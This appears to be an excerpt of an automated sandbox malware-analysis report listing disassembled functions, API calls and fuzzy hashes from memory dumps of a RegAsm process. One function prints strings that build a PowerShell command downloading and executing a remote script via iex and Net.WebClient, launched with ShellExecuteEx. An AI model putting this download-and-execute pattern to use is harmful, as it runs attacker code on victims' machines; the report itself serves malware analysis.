Opcode Fuzzy Hash: 8ef9a705d859ecc5bab16000e46d47ff4b4cc8dcc1e2edb7abebde61ba7d20d0
Instruction Fuzzy Hash: DB61CE79A083409BDB10DF25C88079AB7F6BFC5318F15891DE89947712EB71F889CB82

Function 6C08E9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,6C091999), ref: 6C08EA39
memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C08EA5C
memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C08EA76
moz_xmalloc.MOZGLUE(-00000001,?,?,6C091999), ref: 6C08EA9D
memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C091999), ref: 6C08EAC2
memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C08EADC
free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C08EB0B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C08EB27

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 706364981-0
Opcode ID: 4f2d17f55b96a01ba42baad529dfe96993fb743e4dc2f2a6568de24976e5db0c
Instruction ID: 33ca67127cb9d9d1055fca48705ac4981dcb0211b25bd00abc774726e6822451
Opcode Fuzzy Hash: 4f2d17f55b96a01ba42baad529dfe96993fb743e4dc2f2a6568de24976e5db0c
Instruction Fuzzy Hash: B241B4B5A012159FDB14CFA8DC80BAF77E4FF45268F244628E825E7794E730EA0487D1

Function 6C08B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C08B61E,?,?,?,?,?,00000000), ref: 6C08B6AC

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C08B61E,?,?,?,?,?,00000000), ref: 6C08B6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C08B61E,?,?,?,?,?,00000000), ref: 6C08B6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C08B61E,?,?,?,?,?,00000000), ref: 6C08B70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C08B61E,?,?,?,?,?,00000000), ref: 6C08B71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C08B61E), ref: 6C08B73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C08B61E,?,?,?,?,?,00000000), ref: 6C08B760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C08B61E,?,?,?,?,?,00000000), ref: 6C08B79A

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: 06fa0c56c549c97f5a8893d4ca35ff4133e9d60b09516bc91e04fe1d06888f7e
Instruction ID: be2798b0e1ab57cdded01f40089458bf8717993374f0f5c848727cc700fb2adf
Opcode Fuzzy Hash: 06fa0c56c549c97f5a8893d4ca35ff4133e9d60b09516bc91e04fe1d06888f7e
Instruction Fuzzy Hash: 0941D2B2D052158FCF14DF68DC807AEB7F9BB44324F254629E825E7780E731AA0587D1

Function 6C08EF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(6C105104), ref: 6C08EFAC
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C08EFD7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C08EFEC
free.MOZGLUE(?), ref: 6C08F00C
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C08F02E
memcpy.VCRUNTIME140(00000000,?), ref: 6C08F041
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C08F065
moz_xmalloc.MOZGLUE ref: 6C08F072

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 1148890222-0
Opcode ID: f955ec647adf65e52d11a5d32dd26bcbac5672d2a4182f2f1186dfeda5603c06
Instruction ID: 681db453cb1b29ad9870913cb74e894bf87bf122dbad12f3681882c393932585
Opcode Fuzzy Hash: f955ec647adf65e52d11a5d32dd26bcbac5672d2a4182f2f1186dfeda5603c06
Instruction Fuzzy Hash: C841D9B1A001159FCF18CF78DC816AE77E9BF88314B244228E825D7795EB71E915CBE1

Function 6C0FB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C0FB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C0FB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C0FB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C0FB5F4
__Init_thread_footer.LIBCMT ref: 6C0FB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C0FB61F
std::_Facet_Register.LIBCPMT ref: 6C0FB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0FB655

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 5e91a590665f89e329565c7af354c797fec09fab0f125089936228d4b1c31683
Instruction ID: 39ae37f46b93a4375f7ffcb6a53e72eb7d8242374f4c5fd63bb41c0b36cad08e
Opcode Fuzzy Hash: 5e91a590665f89e329565c7af354c797fec09fab0f125089936228d4b1c31683
Instruction Fuzzy Hash: A8319C71B002048BCF00DB69C899AAEB7F5FF8A728B14051DE922A7740DF35A846DF95

Function 6C099830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6C0E7ABE), ref: 6C09985B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C0E7ABE), ref: 6C0998A8
moz_xmalloc.MOZGLUE(00000020), ref: 6C099909
memcpy.VCRUNTIME140(00000023,?,?), ref: 6C099918
free.MOZGLUE(?), ref: 6C099975

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
String ID:
API String ID: 1281542009-0
Opcode ID: ce59304cc0bff5a25b9a7ed554eef2740377ffba8357ef21a6e96cabf7322981
Instruction ID: 21e1f15d22eec75f97f333ed84a56fdcc67e0c3967f64be3529ba8abb484cab0
Opcode Fuzzy Hash: ce59304cc0bff5a25b9a7ed554eef2740377ffba8357ef21a6e96cabf7322981
Instruction Fuzzy Hash: 85718A746047058FC725CF2CC480B5AB7F1FF4A324B645AADE85A8BBA0D771B842CB91

Function 6C09B790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C0DCC83,?,?,?,?,?,?,?,?,?,6C0DBCAE,?,?,6C0CDC2C), ref: 6C09B7E6
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C0DCC83,?,?,?,?,?,?,?,?,?,6C0DBCAE,?,?,6C0CDC2C), ref: 6C09B80C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C0DCC83,?,?,?,?,?,?,?,?,?,6C0DBCAE), ref: 6C09B88E
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C0DCC83,?,?,?,?,?,?,?,?,?,6C0DBCAE,?,?,6C0CDC2C), ref: 6C09B896

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
String ID:
API String ID: 922945588-0
Opcode ID: 304769378d0034729e4796e03627529c3d54f7fe9c616919293faf7365dc069d
Instruction ID: b1f0b77726471f29fb28c2cddeb384cb7ecaf613a2d7459f399785ffaa18298e
Opcode Fuzzy Hash: 304769378d0034729e4796e03627529c3d54f7fe9c616919293faf7365dc069d
Instruction Fuzzy Hash: 1B516835B006048FCB25DF59C584B6ABBF5FF8D328B69855DE98A87791CB31E801DB80

Function 6C0C4AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C0C4AB7,?,6C0843CF,?,6C0842D2), ref: 6C0C4B48
free.MOZGLUE(?,?,?,80000000,?,6C0C4AB7,?,6C0843CF,?,6C0842D2), ref: 6C0C4B7F
memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C0C4AB7,?,6C0843CF,?,6C0842D2), ref: 6C0C4B94
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C0C4AB7,?,6C0843CF,?,6C0842D2), ref: 6C0C4BBC
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6C0C4AB7,?,6C0843CF,?,6C0842D2), ref: 6C0C4BEE

Strings

pid:, xrefs: 6C0C4BE8

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
String ID: pid:
API String ID: 1916652239-3403741246
Opcode ID: 7a6fe9105eb6e318d9ffb794751a333d280f29a75129edaa7a23a226d0e54573
Instruction ID: 7615a0b1f059af50fe148c101abab399326e42cc9c7f3f7465e11189c2824e88
Opcode Fuzzy Hash: 7a6fe9105eb6e318d9ffb794751a333d280f29a75129edaa7a23a226d0e54573
Instruction Fuzzy Hash: D041C8717042559BCB14CEB8DC806AFBBF9BF95224B144638E865D7785DB30A90887A2

Function 00412D70 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412EC0

Strings

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412E5B
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412E18
')", xrefs: 00412E13
C:\ProgramData\, xrefs: 00412DA3
.ps1, xrefs: 00412DF3

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 2215929589-1989157005
Opcode ID: a3660bf6eb38366a5fc88e1f2295be1a68adea8c2c4e3bb7b595f6666764ac78
Instruction ID: d4bc49303887be4e6334ac6b4843b1e71d055e880c24203978c9a7e3e1ca0007
Opcode Fuzzy Hash: a3660bf6eb38366a5fc88e1f2295be1a68adea8c2c4e3bb7b595f6666764ac78
Instruction Fuzzy Hash: 4641FB71E00119ABCF11FBA6DD469CDB7B4AF04308F61406BF514B7191DBB86E8A8B98

Function 6C0D1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0D1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C0D1BE3,?,?,6C0D1D96,00000000), ref: 6C0D1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C0D1BE3,?,?,6C0D1D96,00000000), ref: 6C0D1D4C
GetCurrentThreadId.KERNEL32 ref: 6C0D1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0D1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0D1DDA

Part of subcall function 6C0D1EF0: GetCurrentThreadId.KERNEL32 ref: 6C0D1F03
Part of subcall function 6C0D1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C0D1DF2,00000000,00000000), ref: 6C0D1F0C
Part of subcall function 6C0D1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C0D1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C0D1DF4

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 5f40abb0e133dbb4959578be2f1dc21b5e22cf7ca543d87531dbf5ba5fee8b93
Instruction ID: 2609ae6f9362b7a31edca90e73650755c70df7734ef145e8d9bc48b993d050f9
Opcode Fuzzy Hash: 5f40abb0e133dbb4959578be2f1dc21b5e22cf7ca543d87531dbf5ba5fee8b93
Instruction Fuzzy Hash: 004132B56007019FCB10DF29C489B56BBF9FB89368F11442EE99A87B41CB71F854CB91

Function 6C0CD210 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C095820,?), ref: 6C0CD21F
moz_xmalloc.MOZGLUE(00000001,?,?,6C095820,?), ref: 6C0CD22E

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6C095820,?), ref: 6C0CD242
free.MOZGLUE(00000000,?,?,?,?,?,?,6C095820,?), ref: 6C0CD253

Part of subcall function 6C0A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0A5EDB
Part of subcall function 6C0A5E90: memset.VCRUNTIME140(6C0E7765,000000E5,55CCCCCC), ref: 6C0A5F27
Part of subcall function 6C0A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0A5FB2

memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6C095820,?), ref: 6C0CD280

Strings

Xl, xrefs: 6C0CD23C, 6C0CD29E, 6C0CD2E3

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
String ID: Xl
API String ID: 2029485308-1981782288
Opcode ID: 0a4adbe2bbbc8c067b2c637d52b9f39464edf28a6245f27411bcb0ec5fe00063
Instruction ID: d2b6b1c0bc69f2c7e89627bc2e7103dea03572b5a4b1b1f1bc6dd1345daf5e45
Opcode Fuzzy Hash: 0a4adbe2bbbc8c067b2c637d52b9f39464edf28a6245f27411bcb0ec5fe00063
Instruction Fuzzy Hash: F131E575A442159BCB00CF58C880BAEBBF5BF99348F244169DA14AB701D372E806CBE2

Function 6C0EAAB0 Relevance: 10.6, APIs: 7, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C10E220,?), ref: 6C0EBC2D
ReleaseSRWLockExclusive.KERNEL32(6C10E220), ref: 6C0EBC42
RtlFreeHeap.NTDLL(?,00000000,6C0FE300), ref: 6C0EBC82
RtlFreeUnicodeString.NTDLL(6C10E210), ref: 6C0EBC91
RtlFreeUnicodeString.NTDLL(6C10E208), ref: 6C0EBCA3
RtlFreeHeap.NTDLL(?,00000000,6C10E21C), ref: 6C0EBCD2
free.MOZGLUE(?), ref: 6C0EBCD8

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: 5bce269959fe7923ed0993e3109e1aa4334c76c4b75799acfeec9e3c03b1ec06
Instruction ID: 8e3672e9a9b5b98afd846209491850345d67bd9ad3298fd7739c321bccad32dd
Opcode Fuzzy Hash: 5bce269959fe7923ed0993e3109e1aa4334c76c4b75799acfeec9e3c03b1ec06
Instruction Fuzzy Hash: 0A21E1726407058FE3209F46C881B6AB7E8FF49718F14846DE86A5BA10CB75F846CBD4

Function 6C0938A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C10E220,?,?,?,?,6C093899,?), ref: 6C0938B2
ReleaseSRWLockExclusive.KERNEL32(6C10E220,?,?,?,6C093899,?), ref: 6C0938C3
free.MOZGLUE(00000000,?,?,?,6C093899,?), ref: 6C0938F1
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C093920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C093899,?), ref: 6C09392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C093899,?), ref: 6C093943
RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C09396E

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: 372c70ac23be2691006ed3b55405b99535f0abb8258434ba05b06fff318e10ad
Instruction ID: 2104c9db198e8c980c3f56908a7a24f52778381d8ba854361790f5f41782cdad
Opcode Fuzzy Hash: 372c70ac23be2691006ed3b55405b99535f0abb8258434ba05b06fff318e10ad
Instruction Fuzzy Hash: 7A21AD726017109FD720DF15C880B86B7E9FF49728F158429E96A97B10C734F886DF90

Function 6C0C84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0C84F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0C850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0C851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0C855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0C856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0C85AC

Part of subcall function 6C0C7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C0C85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0C767F
Part of subcall function 6C0C7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C0C85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0C7693
Part of subcall function 6C0C7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C0C85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0C76A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0C85B2

Part of subcall function 6C0A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0A5EDB
Part of subcall function 6C0A5E90: memset.VCRUNTIME140(6C0E7765,000000E5,55CCCCCC), ref: 6C0A5F27
Part of subcall function 6C0A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0A5FB2

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: f6600f8a5d5530ed3317fe09d4a7e6dd34257388adc4b6c0336168f6306a09e9
Instruction ID: 5e04d01d4e8b1f627ef8d5ecf593501370c22361d6a07f95c88fb1f4b09e7c0f
Opcode Fuzzy Hash: f6600f8a5d5530ed3317fe09d4a7e6dd34257388adc4b6c0336168f6306a09e9
Instruction Fuzzy Hash: 61217C743006019FDB14DB68C888B6AB7F5AF8430CF244A2DE55B83B81DB75F958CB56

Function 6C091640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C091699
VerSetConditionMask.NTDLL ref: 6C0916CB
